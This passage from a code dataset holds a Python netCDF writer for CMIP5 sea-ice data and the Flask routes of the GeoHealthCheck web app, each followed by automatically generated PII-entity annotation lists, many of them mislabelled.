'stanza.fr'], ['URL', 'stanza.fr'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'stanza.st'], ['URL', 'stanza.st'], ['URL', 'stanza.ma'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'stanza.ma'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.st'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'self.no'], ['URL', 'self.pr'], ['URL', 'self.cu'], ['URL', 'self.us'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'user.la'], ['URL', 'self.no'], ['URL', 'self.cu'], ['URL', 'user.la'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'stanza.sh'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'self.se'], ['URL', 'jid.ba'], ['URL', 'self.se'], ['URL', 'jid.re'], ['URL', 'self.pr'], ['URL', 'self.us'], ['URL', 'logging.in'], ['URL', 'stanza.sh'], ['URL', 'self.pr'], ['URL', 'jid.re'], ['URL', 'stanza.sh'], ['URL', 'stanza.st'], ['URL', 'stanza.pr'], ['URL', 'self.ge'], ['URL', 'self.cu'], ['URL', 'jid.re'], ['URL', 'jid.resource.st'], ['URL', 'jid.resource.st'], ['URL', 'self.se'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'jid.re'], ['URL', 'self.pr'], ['URL', 'logging.in'], ['URL', 'self.pr'], ['URL', 'self.no'], ['URL', 'self.us'], ['URL', 'logging.in'], ['URL', 'logging.in'], ['URL', 'jid.ba'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'q.ad'], ['URL', 'self.st'], ['URL', 'processor.se'], ['URL', 'self.se'], ['URL', 'self.ge'], ['URL', 'jabber.org'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'hashlib.ne'], ['URL', 'q.ad'], ['URL', 'self.st'], ['URL', 'processor.se'], ['URL', 'self.se'], ['URL', 'stanza.st'], ['URL', 'logging.er'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'ET.Su'], ['URL', 'presence.ad'], ['URL', 'self.se'], ['URL', 'bot.ru'], ['URL', 'e.co'], ['URL', 'models.co'], ['URL', 'os.cl'], ['URL', 'logging.in'], ['URL', 'sys.ar'], ['URL', 'ChatBot.me'], ['URL', 'bot.me'], ['URL', 'models.connection.Gr'], ['URL', 'gp.st'], ['URL', 'gp.st'], ['URL', 'config.se'], ['URL', 'config.tr'], ['URL', 'logging.in'], ['URL', 'pyxmpp2.IN'], ['URL', 'logging.ge'], ['URL', 'logger.se'], ['URL', 'logging.DE'], ['URL', 'pyxmpp2.mainloop.ba'], ['URL', 'pyxmpp2.ma'], ['URL', 'pyxmpp2.ma'], ['URL', 'pyxmpp2.tr'], ['URL', 'pyxmpp2.ma'], ['URL', 'logging.ge'], ['URL', 'logger.se'], ['URL', 'logging.IN'], ['URL', 'logging.DE'], ['URL', 'models.in']]" +30,"from datetime import datetime, timedelta +from netCDF4 import Dataset +from netCDF4 import num2date +import numpy as np +import time +import os + +__author__ = 'Trond Kristiansen' +__email__ = dummy@email.com' +__created__ = datetime(2014, 1, 23) +__modified__ = datetime(2014, 1, 23) +__version__ = ""0.1"" +__status__ = ""Development"" + + +def help (): + """""" + This function generates a netCDF4 file and saves the runnings average values for + specific years into file for each IPCC AR5 model. + + Used to gether with extractIce.py + """""" + +def writeCMIP5File(modelName,scenario,myvarname,lon,lat,time,mydata,mydataanomaly,outfilename): + + myformat='NETCDF3_CLASSIC' + + if os.path.exists(outfilename): + os.remove(outfilename) + print ""Results written to netcdf file: %s""%(outfilename) + if myvarname==""sic"": myvar=""SIC"" + + f1 = Dataset(outfilename, mode='w', format=myformat) + f1.title = ""IPCC AR5 %s""%(myvar) + f1.description = ""IPCC AR5 running averages of %s for model %s for scenario %s""%(myvar,modelName,scenario) + f1.history = ""Created "" + str(datetime.now()) + f1.source = ""Trond Kristiansen (dummy@email.com)"" + f1.type = ""File in NetCDF3 format created using iceExtract.py"" + f1.Conventions = ""CF-1.0"" + + """"""Define dimensions"""""" + f1.createDimension('x', len(lon)) + f1.createDimension('y', len(lat)) + f1.createDimension('time', None) + + vnc = f1.createVariable('longitude', 'd', ('x',),zlib=False) + vnc.long_name = 'Longitude' + vnc.units = 'degree_east' + vnc.standard_name = 'longitude' + vnc[:] = lon + + vnc = f1.createVariable('latitude', 'd', ('y',),zlib=False) + vnc.long_name = 'Latitude' + vnc.units = 'degree_north' + vnc.standard_name = 'latitude' + vnc[:] = lat + + v_time = f1.createVariable('time', 'd', ('time',),zlib=False) + v_time.long_name = 'Years' + v_time.units = 'Years' + v_time.field = 'time, scalar, series' + v_time[:]=time + + v_temp=f1.createVariable('SIC', 'd', ('time', 'y', 'x',),zlib=False) + v_temp.long_name = ""Sea-ice area fraction (%)"" + v_temp.units = ""%"" + v_temp.time = ""time"" + v_temp.field=""SIC, scalar, series"" + v_temp.missing_value = 1e20 + + + if myvarname=='sic': + f1.variables['SIC'][:,:,:] = mydata + + f1.close() +",2388,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', ""Trond Kristiansen'""], ['DATE_TIME', 'years'], ['PERSON', 'lat'], ['PERSON', 'mydata'], ['LOCATION', 'mydataanomaly'], ['LOCATION', 'outfilename'], ['PERSON', 'netcdf'], ['PERSON', 'myformat'], ['PERSON', 'f1.source'], ['PERSON', 'Trond Kristiansen'], ['PERSON', ""f1.createDimension('x""], ['DATE_TIME', ""'Years'""], ['DATE_TIME', ""'Years'""], ['PERSON', 'mydata\n \n f1.close'], ['URL', 'email.com'], ['URL', 'extractIce.py'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'f1.de'], ['URL', 'datetime.no'], ['URL', 'f1.so'], ['URL', 'email.com'], ['URL', 'iceExtract.py'], ['URL', 'f1.Co'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'vnc.st'], ['URL', 'f1.cr'], ['URL', 'vnc.st'], ['URL', 'f1.cr'], ['URL', 'time.fi'], ['URL', 'f1.cr'], ['URL', 'temp.fi'], ['URL', 'f1.va'], ['URL', 'f1.cl']]" +31,"# ================================================================= +# +# Authors: Tom Kralidis dummy@email.com +# Just van den Broecke dummy@email.com +# +# Copyright (c) 2014 Tom Kralidis +# +# Permission is hereby granted, free of charge, to any person +# obtaining a copy of this software and associated documentation +# files (the ""Software""), to deal in the Software without +# restriction, including without limitation the rights to use, +# copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the +# Software is furnished to do so, subject to the following +# conditions: +# +# The above copyright notice and this permission notice shall be +# included in all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, +# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES +# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT +# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR +# OTHER DEALINGS IN THE SOFTWARE. +# +# ================================================================= + +import base64 +import csv +import json +import logging +from io import StringIO + +from flask import (abort, flash, g, jsonify, redirect, + render_template, request, url_for) +from flask_babel import gettext +from flask_login import (LoginManager, login_user, logout_user, + current_user, login_required) +from flask_migrate import Migrate +from itertools import chain + +import views +from __init__ import __version__ +from enums import RESOURCE_TYPES +from factory import Factory +from init import App +from models import Resource, Run, ProbeVars, CheckVars, Tag, User, Recipient +from resourceauth import ResourceAuth +from util import send_email, geocode, format_checked_datetime, \ + format_run_status, format_obj_value + +# Module globals for convenience +LOGGER = logging.getLogger(__name__) +APP = App.get_app() +CONFIG = App.get_config() +DB = App.get_db() +BABEL = App.get_babel() + +MIGRATE = Migrate(APP, DB) + +LOGIN_MANAGER = LoginManager() +LOGIN_MANAGER.init_app(APP) + +LANGUAGES = ( + ('en', 'English'), + ('fr', 'Français'), + ('de', 'German'), + ('nl_NL', 'Nederlands (Nederland)'), + ('es_BO', 'Español (Bolivia)'), + ('hr_HR', 'Croatian (Croatia)') +) + +# Should GHC Runner be run within GHC webapp? +if CONFIG['GHC_RUNNER_IN_WEBAPP'] is True: + LOGGER.info('Running GHC Scheduler in WebApp') + from scheduler import start_schedule + + # Start scheduler + start_schedule() +else: + LOGGER.info('NOT Running GHC Scheduler in WebApp') + + +# commit or rollback shorthand +def db_commit(): + err = None + try: + DB.session.commit() + except Exception: + DB.session.rollback() + # finally: + # DB.session.close() + return err + + +@APP.before_request +def before_request(): + g.user = current_user + if request.args and 'lang' in request.args and request.args['lang'] != '': + g.current_lang = request.args['lang'] + if not hasattr(g, 'current_lang'): + g.current_lang = 'en' + + if CONFIG['GHC_REQUIRE_WEBAPP_AUTH'] is True: + # Login is required to access GHC Webapp. + # We need to pass-through static resources like CSS. + if any(['/static/' in request.path, + request.path.endswith('.ico'), + g.user.is_authenticated(), # This is from Flask-Login + (request.endpoint is not None + and getattr(APP.view_functions[request.endpoint], + 'is_public', False))]): + return # Access granted + else: + return redirect(url_for('login')) + + +# Marks (endpoint-) function as always to be accessible +# (used for GHC_REQUIRE_WEBAPP_AUTH) +def public_route(decorated_function): + decorated_function.is_public = True + return decorated_function + + +@APP.teardown_appcontext +def shutdown_session(exception=None): + DB.session.remove() + + +@BABEL.localeselector +def get_locale(): + return g.get('current_lang', 'en') + # return request.accept_languages.best_match(LANGUAGES.keys()) + + +@LOGIN_MANAGER.user_loader +def load_user(identifier): + return User.query.get(int(identifier)) + + +@LOGIN_MANAGER.unauthorized_handler +def unauthorized_callback(): + if request.query_string: + url = '%s%s?%s' % (request.script_root, request.path, + request.query_string) + else: + url = '%s%s' % (request.script_root, request.path) + return redirect(url_for('login', lang=g.current_lang, next=url)) + + +@LOGIN_MANAGER.request_loader +def load_user_from_request(request): + + # Try to login using Basic Auth + # Inspiration: https://flask-login.readthedocs.io + # /en/latest/#custom-login-using-request-loader + basic_auth_val = request.headers.get('Authorization') + if basic_auth_val: + basic_auth_val = basic_auth_val.replace('Basic ', '', 1) + authenticated = False + try: + username, password = base64.b64decode(basic_auth_val).split(':') + + user = User.query.filter_by(username=username).first() + if user: + authenticated = user.authenticate(password) + finally: + # Ignore errors, they should all fail the auth attempt + pass + + if not authenticated: + LOGGER.warning('Unauthorized access for user=%s' % username) + abort(401) + else: + return user + + # TODO: may add login via api-key or token here + + # finally, return None if both methods did not login the user + return None + + +@APP.template_filter('cssize_reliability') +def cssize_reliability(value, css_type=None): + """"""returns CSS button class snippet based on score"""""" + + number = int(value) + + if CONFIG['GHC_RELIABILITY_MATRIX']['red']['min'] <= number <= \ + CONFIG['GHC_RELIABILITY_MATRIX']['red']['max']: + score = 'danger' + panel = 'red' + elif (CONFIG['GHC_RELIABILITY_MATRIX']['orange']['min'] <= number <= + CONFIG['GHC_RELIABILITY_MATRIX']['orange']['max']): + score = 'warning' + panel = 'yellow' + elif (CONFIG['GHC_RELIABILITY_MATRIX']['green']['min'] <= number <= + CONFIG['GHC_RELIABILITY_MATRIX']['green']['max']): + score = 'success' + panel = 'green' + else: # should never really get here + score = 'info' + panel = 'blue' + + if css_type is not None and css_type == 'panel': + return panel + else: + return score + + +@APP.template_filter('cssize_reliability2') +def cssize_reliability2(value): + """"""returns CSS panel class snippet based on score"""""" + + return cssize_reliability(value, 'panel') + + +@APP.template_filter('round2') +def round2(value): + """"""rounds a number to 2 decimal places except for values of 0 or 100"""""" + + if value in [0.0, 100.0]: + return int(value) + return round(value, 2) + + +@APP.context_processor +def context_processors(): + """"""global context processors for templates"""""" + + rtc = views.get_resource_types_counts() + tags = views.get_tag_counts() + return { + 'app_version': __version__, + 'resource_types': RESOURCE_TYPES, + 'resource_types_counts': rtc['counts'], + 'resources_total': rtc['total'], + 'languages': LANGUAGES, + 'tags': tags, + 'tagnames': list(tags.keys()) + } + + +@APP.route('/') +def home(): + """"""homepage"""""" + + response = views.get_health_summary() + return render_template('home.html', response=response) + + +@APP.route('/csv', endpoint='csv') +@APP.route('/json', endpoint='json') +def export(): + """"""export resource list as JSON"""""" + + resource_type = None + + if request.args.get('resource_type') in RESOURCE_TYPES.keys(): + resource_type = request.args['resource_type'] + + query = request.args.get('q') + + response = views.list_resources(resource_type, query) + + if request.url_rule.rule == '/json': + json_dict = {'total': response['total'], 'resources': []} + for r in response['resources']: + try: + ghc_url = '%s/resource/%s' % \ + (CONFIG['GHC_SITE_URL'], r.identifier) + last_run_report = '-' + if r.last_run: + last_run_report = r.last_run.report + + json_dict['resources'].append({ + 'resource_type': r.resource_type, + 'title': r.title, + 'url': r.url, + 'ghc_url': ghc_url, + 'ghc_json': '%s/json' % ghc_url, + 'ghc_csv': '%s/csv' % ghc_url, + 'first_run': format_checked_datetime(r.first_run), + 'last_run': format_checked_datetime(r.last_run), + 'status': format_run_status(r.last_run), + 'min_response_time': round(r.min_response_time, 2), + 'average_response_time': round(r.average_response_time, 2), + 'max_response_time': round(r.max_response_time, 2), + 'reliability': round(r.reliability, 2), + 'last_report': format_obj_value(last_run_report) + }) + except Exception as e: + LOGGER.warning( + 'JSON error resource id=%d: %s' % (r.identifier, str(e))) + + return jsonify(json_dict) + elif request.url_rule.rule == '/csv': + output = StringIO() + writer = csv.writer(output) + header = [ + 'resource_type', 'title', 'url', 'ghc_url', 'ghc_json', 'ghc_csv', + 'first_run', 'last_run', 'status', 'min_response_time', + 'average_response_time', 'max_response_time', 'reliability' + ] + writer.writerow(header) + for r in response['resources']: + try: + ghc_url = '%s%s' % (CONFIG['GHC_SITE_URL'], + url_for('get_resource_by_id', + identifier=r.identifier)) + + writer.writerow([ + r.resource_type, + r.title, + r.url, + ghc_url, + '%s/json' % ghc_url, + '%s/csv' % ghc_url, + format_checked_datetime(r.first_run), + format_checked_datetime(r.last_run), + format_run_status(r.last_run), + round(r.min_response_time, 2), + round(r.average_response_time, 2), + round(r.max_response_time, 2), + round(r.reliability, 2) + ]) + except Exception as e: + LOGGER.warning( + 'CSV error resource id=%d: %s' % (r.identifier, str(e))) + + return output.getvalue(), 200, {'Content-type': 'text/csv'} + + +@APP.route('/opensearch') +def opensearch(): + """"""generate OpenSearch description document"""""" + + content = render_template('opensearch_description.xml') + + return content, 200, {'Content-type': 'text/xml'} + + +@APP.route('/resource//csv', endpoint='csv-resource') +@APP.route('/resource//json', endpoint='json-resource') +def export_resource(identifier): + """"""export resource as JSON or CSV"""""" + + resource = views.get_resource_by_id(identifier) + + history_csv = '%s/resource/%s/history/csv' % (CONFIG['GHC_SITE_URL'], + resource.identifier) + history_json = '%s/resource/%s/history/json' % (CONFIG['GHC_SITE_URL'], + resource.identifier) + if 'json' in request.url_rule.rule: + last_run_report = '-' + if resource.last_run: + last_run_report = resource.last_run.report + + json_dict = { + 'identifier': resource.identifier, + 'title': resource.title, + 'url': resource.url, + 'resource_type': resource.resource_type, + 'owner': resource.owner.username, + 'min_response_time': resource.min_response_time, + 'average_response_time': resource.average_response_time, + 'max_response_time': resource.max_response_time, + 'reliability': resource.reliability, + 'status': format_run_status(resource.last_run), + 'first_run': format_checked_datetime(resource.first_run), + 'last_run': format_checked_datetime(resource.last_run), + 'history_csv': history_csv, + 'history_json': history_json, + 'last_report': format_obj_value(last_run_report) + } + return jsonify(json_dict) + elif 'csv' in request.url_rule.rule: + output = StringIO() + writer = csv.writer(output) + header = [ + 'identifier', 'title', 'url', 'resource_type', 'owner', + 'min_response_time', 'average_response_time', 'max_response_time', + 'reliability', 'status', 'first_run', 'last_run', 'history_csv', + 'history_json' + ] + + writer.writerow(header) + writer.writerow([ + resource.identifier, + resource.title, + resource.url, + resource.resource_type, + resource.owner.username, + resource.min_response_time, + resource.average_response_time, + resource.max_response_time, + resource.reliability, + format_run_status(resource.last_run), + format_checked_datetime(resource.first_run), + format_checked_datetime(resource.last_run), + history_csv, + history_json + ]) + return output.getvalue(), 200, {'Content-type': 'text/csv'} + + +@APP.route('/resource//history/csv', + endpoint='csv-resource-history') +@APP.route('/resource//history/json', + endpoint='json-resource-history') +def export_resource_history(identifier): + """"""export resource history as JSON or CSV"""""" + + resource = views.get_resource_by_id(identifier) + + if 'json' in request.url_rule.rule: + json_dict = {'runs': []} + + for run in resource.runs: + json_dict['runs'].append({ + 'owner': resource.owner.username, + 'resource_type': resource.resource_type, + 'checked_datetime': format_checked_datetime(run), + 'title': resource.title, + 'url': resource.url, + 'response_time': round(run.response_time, 2), + 'status': format_run_status(run) + }) + return jsonify(json_dict) + elif 'csv' in request.url_rule.rule: + output = StringIO() + writer = csv.writer(output) + header = [ + 'owner', 'resource_type', 'checked_datetime', 'title', 'url', + 'response_time', 'status' + ] + writer.writerow(header) + for run in resource.runs: + writer.writerow([ + resource.owner.username, + resource.resource_type, + format_checked_datetime(run), + resource.title, + resource.url, + round(run.response_time, 2), + format_run_status(run), + ]) + return output.getvalue(), 200, {'Content-type': 'text/csv'} + + +@APP.route('/settings') +def settings(): + """"""settings"""""" + pass + + +@APP.route('/resources') +def resources(): + """"""lists resources with optional filter"""""" + + resource_type = None + + if request.args.get('resource_type') in RESOURCE_TYPES.keys(): + resource_type = request.args['resource_type'] + + tag = request.args.get('tag') + + query = request.args.get('q') + + response = views.list_resources(resource_type, query, tag) + return render_template('resources.html', response=response) + + +@APP.route('/resource/') +def get_resource_by_id(identifier): + """"""show resource"""""" + + response = views.get_resource_by_id(identifier) + return render_template('resource.html', resource=response) + + +@APP.route('/register', methods=['GET', 'POST']) +def register(): + """"""register a new user"""""" + if not CONFIG['GHC_SELF_REGISTER']: + msg1 = gettext('This site is not configured for self-registration') + msg2 = gettext('Please contact') + msg = '%s. %s %s' % (msg1, msg2, + CONFIG['GHC_ADMIN_EMAIL']) + flash('%s' % msg, 'danger') + return render_template('register.html', errmsg=msg) + if request.method == 'GET': + return render_template('register.html') + + # Check for existing user or email + user = User.query.filter_by(username=request.form['username']).first() + email = User.query.filter_by(email=request.form['email']).first() + if user or email: + flash('%s' % gettext('Invalid username or email'), 'danger') + return render_template('register.html') + + user = User(request.form['username'], + request.form['password'], request.form['email']) + + DB.session.add(user) + try: + DB.session.commit() + except Exception as err: + DB.session.rollback() + bad_column = err.message.split()[2] + bad_value = request.form[bad_column] + msg = gettext('already registered') + flash('%s %s %s' % (bad_column, bad_value, msg), 'danger') + return redirect(url_for('register', lang=g.current_lang)) + return redirect(url_for('login', lang=g.current_lang)) + + +@APP.route('/add', methods=['GET', 'POST']) +@login_required +def add(): + """"""add resource"""""" + if not g.user.is_authenticated(): + return render_template('add.html') + if request.method == 'GET': + return render_template('add.html') + resource_type = request.form['resource_type'] + tags = request.form.getlist('tags') + url = request.form['url'].strip() + resources_to_add = [] + + from healthcheck import sniff_test_resource, run_test_resource + sniffed_resources = sniff_test_resource(CONFIG, resource_type, url) + + if not sniffed_resources: + msg = gettext(""No resources detected"") + LOGGER.exception() + flash(msg, 'danger') + + for (resource_type, resource_url, + title, success, response_time, + message, start_time, resource_tags,) in sniffed_resources: + + tags_to_add = [] + for tag in chain(tags, resource_tags): + tag_obj = tag + if not isinstance(tag, Tag): + tag_obj = Tag.query.filter_by(name=tag).first() + if tag_obj is None: + tag_obj = Tag(name=tag) + tags_to_add.append(tag_obj) + + resource_to_add = Resource(current_user, + resource_type, + title, + resource_url, + tags=tags_to_add) + + resources_to_add.append(resource_to_add) + probe_to_add = None + checks_to_add = [] + + # Always add a default Probe and Check(s) + # from the GHC_PROBE_DEFAULTS conf + if resource_type in CONFIG['GHC_PROBE_DEFAULTS']: + resource_settings = CONFIG['GHC_PROBE_DEFAULTS'][resource_type] + probe_class = resource_settings['probe_class'] + if probe_class: + # Add the default Probe + probe_obj = Factory.create_obj(probe_class) + probe_to_add = ProbeVars( + resource_to_add, probe_class, + probe_obj.get_default_parameter_values()) + + # Add optional default (parameterized) + # Checks to add to this Probe + checks_info = probe_obj.get_checks_info() + checks_param_info = probe_obj.get_plugin_vars()['CHECKS_AVAIL'] + for check_class in checks_info: + check_param_info = checks_param_info[check_class] + if 'default' in checks_info[check_class]: + if checks_info[check_class]['default']: + # Filter out params for Check with fixed values + param_defs = check_param_info['PARAM_DEFS'] + param_vals = {} + for param in param_defs: + if param_defs[param]['value']: + param_vals[param] = \ + param_defs[param]['value'] + check_vars = CheckVars( + probe_to_add, check_class, param_vals) + checks_to_add.append(check_vars) + + result = run_test_resource(resource_to_add) + + run_to_add = Run(resource_to_add, result) + + DB.session.add(resource_to_add) + # prepopulate notifications for current user + resource_to_add.set_recipients('email', [g.user.email]) + + if probe_to_add: + DB.session.add(probe_to_add) + for check_to_add in checks_to_add: + DB.session.add(check_to_add) + DB.session.add(run_to_add) + + try: + DB.session.commit() + msg = gettext('Services registered') + flash('%s (%s, %s)' % (msg, resource_type, url), 'success') + except Exception as err: + DB.session.rollback() + flash(str(err), 'danger') + return redirect(url_for('home', lang=g.current_lang)) + + if len(resources_to_add) == 1: + return edit_resource(resources_to_add[0].identifier) + return redirect(url_for('home', lang=g.current_lang)) + + +@APP.route('/resource//update', methods=['POST']) +@login_required +def update(resource_identifier): + """"""update a resource"""""" + + update_counter = 0 + status = 'success' + + try: + resource_identifier_dict = request.get_json() + + resource = Resource.query.filter_by( + identifier=resource_identifier).first() + + for key, value in resource_identifier_dict.items(): + if key == 'tags': + resource_tags = [t.name for t in resource.tags] + + tags_to_add = set(value) - set(resource_tags) + tags_to_delete = set(resource_tags) - set(value) + + # Existing Tags: create relation else add new Tag + all_tag_objs = Tag.query.all() + for tag in tags_to_add: + tag_add_obj = None + for tag_obj in all_tag_objs: + if tag == tag_obj.name: + # use existing + tag_add_obj = tag_obj + break + + if not tag_add_obj: + # add new + tag_add_obj = Tag(name=tag) + DB.session.add(tag_add_obj) + + resource.tags.append(tag_add_obj) + + for tag in tags_to_delete: + tag_to_delete = Tag.query.filter_by(name=tag).first() + resource.tags.remove(tag_to_delete) + + update_counter += 1 + elif key == 'probes': + # Remove all existing ProbeVars for Resource + for probe_var in resource.probe_vars: + resource.probe_vars.remove(probe_var) + + # Add ProbeVars anew each with optional CheckVars + for probe in value: + LOGGER.info('adding Probe class=%s parms=%s' % + (probe['probe_class'], str(probe))) + probe_vars = ProbeVars(resource, probe['probe_class'], + probe['parameters']) + for check in probe['checks']: + check_vars = CheckVars( + probe_vars, check['check_class'], + check['parameters']) + probe_vars.check_vars.append(check_vars) + + resource.probe_vars.append(probe_vars) + + update_counter += 1 + elif key == 'notify_emails': + resource.set_recipients('email', + [v for v in value if v.strip()]) + elif key == 'notify_webhooks': + resource.set_recipients('webhook', + [v for v in value if v.strip()]) + elif key == 'auth': + resource.auth = value + elif getattr(resource, key) != resource_identifier_dict[key]: + # Update other resource attrs, mainly 'name' + setattr(resource, key, resource_identifier_dict[key]) + min_run_freq = CONFIG['GHC_MINIMAL_RUN_FREQUENCY_MINS'] + if int(resource.run_frequency) < min_run_freq: + resource.run_frequency = min_run_freq + update_counter += 1 + + # Always update geo-IP: maybe failure on creation or + # IP-address of URL may have changed. + latitude, longitude = geocode(resource.url) + if latitude != 0.0 and longitude != 0.0: + # Only update for valid lat/lon + resource.latitude = latitude + resource.longitude = longitude + update_counter += 1 + + except Exception as err: + LOGGER.error(""Cannot update resource: %s"", err, exc_info=err) + DB.session.rollback() + status = str(err) + update_counter = 0 + # finally: + # DB.session.close() + + if update_counter > 0: + err = db_commit() + if err: + status = str(err) + + return jsonify({'status': status}) + + +@APP.route('/resource//test', methods=['GET', 'POST']) +@login_required +def test(resource_identifier): + """"""test a resource"""""" + resource = Resource.query.filter_by(identifier=resource_identifier).first() + if resource is None: + flash(gettext('Resource not found'), 'danger') + return redirect(request.referrer) + + from healthcheck import run_test_resource + result = run_test_resource( + resource) + + if request.method == 'GET': + if result.message == 'Skipped': + msg = gettext('INFO') + flash('%s: %s' % (msg, result.message), 'info') + elif result.message not in ['OK', None, 'None']: + msg = gettext('ERROR') + flash('%s: %s' % (msg, result.message), 'danger') + else: + flash(gettext('Resource tested successfully'), 'success') + + return redirect(url_for('get_resource_by_id', lang=g.current_lang, + identifier=resource_identifier)) + elif request.method == 'POST': + return jsonify(result.get_report()) + + +@APP.route('/resource//edit') +@login_required +def edit_resource(resource_identifier): + """"""edit a resource"""""" + resource = Resource.query.filter_by(identifier=resource_identifier).first() + if resource is None: + flash(gettext('Resource not found'), 'danger') + return redirect(request.referrer) + + probes_avail = views.get_probes_avail(resource.resource_type, resource) + + suggestions = json.dumps(Recipient.get_suggestions('email', + g.user.username)) + + return render_template('edit_resource.html', + lang=g.current_lang, + resource=resource, + suggestions=suggestions, + auths_avail=ResourceAuth.get_auth_defs(), + probes_avail=probes_avail) + + +@APP.route('/resource//delete') +@login_required +def delete(resource_identifier): + """"""delete a resource"""""" + resource = Resource.query.filter_by(identifier=resource_identifier).first() + if g.user.role != 'admin' and g.user.username != resource.owner.username: + msg = gettext('You do not have access to delete this resource') + flash(msg, 'danger') + return redirect(url_for('get_resource_by_id', lang=g.current_lang, + identifier=resource_identifier)) + + if resource is None: + flash(gettext('Resource not found'), 'danger') + return redirect(url_for('home', lang=g.current_lang)) + + resource.clear_recipients() + DB.session.delete(resource) + + try: + DB.session.commit() + flash(gettext('Resource deleted'), 'success') + return redirect(url_for('home', lang=g.current_lang)) + except Exception as err: + DB.session.rollback() + flash(str(err), 'danger') + return redirect(url_for(request.referrer)) + + +@APP.route('/probe///edit_form') +@APP.route('/probe//edit_form') +@login_required +def get_probe_edit_form(probe_class, resource_identifier=None): + """"""get the form to edit a Probe"""""" + + probe_obj = Factory.create_obj(probe_class) + if resource_identifier: + resource = views.get_resource_by_id(resource_identifier) + if resource: + probe_obj._resource = resource + probe_obj.expand_params(resource) + + probe_info = probe_obj.get_plugin_vars() + probe_vars = ProbeVars( + None, probe_class, probe_obj.get_default_parameter_values()) + + # Get only the default Checks for this Probe class + checks_avail = probe_obj.get_checks_info_defaults() + checks_avail = probe_obj.expand_check_vars(checks_avail) + + for check_class in checks_avail: + check_obj = Factory.create_obj(check_class) + check_params = check_obj.get_default_parameter_values() + probe_check_param_defs = \ + probe_info['CHECKS_AVAIL'][check_class]['PARAM_DEFS'] + for param in probe_check_param_defs: + if 'value' in probe_check_param_defs[param]: + check_params[param] = probe_check_param_defs[param]['value'] + + # Appends 'check_vars' to 'probe_vars' (SQLAlchemy) + CheckVars(probe_vars, check_class, check_params) + + return render_template('includes/probe_edit_form.html', + lang=g.current_lang, + probe=probe_vars, probe_info=probe_info) + + +@APP.route('/check//edit_form') +@login_required +def get_check_edit_form(check_class): + """"""get the form to edit a Check"""""" + + check_obj = Factory.create_obj(check_class) + check_info = check_obj.get_plugin_vars() + check_vars = CheckVars( + None, check_class, check_obj.get_default_parameter_values()) + + return render_template('includes/check_edit_form.html', + lang=g.current_lang, + check=check_vars, check_info=check_info) + + +@APP.route('/login', methods=['GET', 'POST']) +@public_route +def login(): + """"""login"""""" + if request.method == 'GET': + return render_template('login.html') + username = request.form['username'] + password = request.form['password'] + registered_user = User.query.filter_by(username=username).first() + authenticated = False + if registered_user: + # May not have upgraded to pw encryption: warn + if len(registered_user.password) < 80: + msg = 'Please upgrade GHC to encrypted passwords first, see docs!' + flash(gettext(msg), 'danger') + return redirect(url_for('login', lang=g.current_lang)) + + try: + authenticated = registered_user.authenticate(password) + finally: + pass + + if not authenticated: + flash(gettext('Invalid username and / or password'), 'danger') + return redirect(url_for('login', lang=g.current_lang)) + + # Login ok + login_user(registered_user) + + if 'next' in request.args: + return redirect(request.args.get('next')) + return redirect(url_for('home', lang=g.current_lang)) + + +@APP.route('/logout') +def logout(): + """"""logout"""""" + logout_user() + flash(gettext('Logged out'), 'success') + if request.referrer: + return redirect(request.referrer) + else: + return redirect(url_for('home', lang=g.current_lang)) + + +@APP.route('/reset_req', methods=['GET', 'POST']) +@public_route +def reset_req(): + """""" + Reset password request handling. + """""" + if request.method == 'GET': + return render_template('reset_password_request.html') + + # Reset request form with email + email = request.form['email'] + registered_user = User.query.filter_by(email=email).first() + if registered_user is None: + LOGGER.warn('Invalid email for reset_req: %s' % email) + flash(gettext('Invalid email'), 'danger') + return redirect(url_for('reset_req', lang=g.current_lang)) + + # Generate reset url using user-specific token + token = registered_user.get_token() + reset_url = '%s/reset/%s' % (CONFIG['GHC_SITE_URL'], token) + + # Create message body with reset link + msg_body = render_template('reset_password_email.txt', + lang=g.current_lang, config=CONFIG, + reset_url=reset_url, + username=registered_user.username) + + try: + from email.mime.text import MIMEText + from email.utils import formataddr + msg = MIMEText(msg_body, 'plain', 'utf-8') + msg['From'] = formataddr((CONFIG['GHC_SITE_TITLE'], + CONFIG['GHC_ADMIN_EMAIL'])) + msg['To'] = registered_user.email + msg['Subject'] = '[%s] %s' % (CONFIG['GHC_SITE_TITLE'], + gettext('reset password')) + + from_addr = '%s <%s>' % (CONFIG['GHC_SITE_TITLE'], + CONFIG['GHC_ADMIN_EMAIL']) + + to_addr = registered_user.email + + msg_text = msg.as_string() + send_email(CONFIG['GHC_SMTP'], from_addr, to_addr, msg_text) + except Exception as err: + msg = 'Cannot send email. Contact admin: ' + LOGGER.warn(msg + ' err=' + str(err)) + flash(gettext(msg) + CONFIG['GHC_ADMIN_EMAIL'], 'danger') + 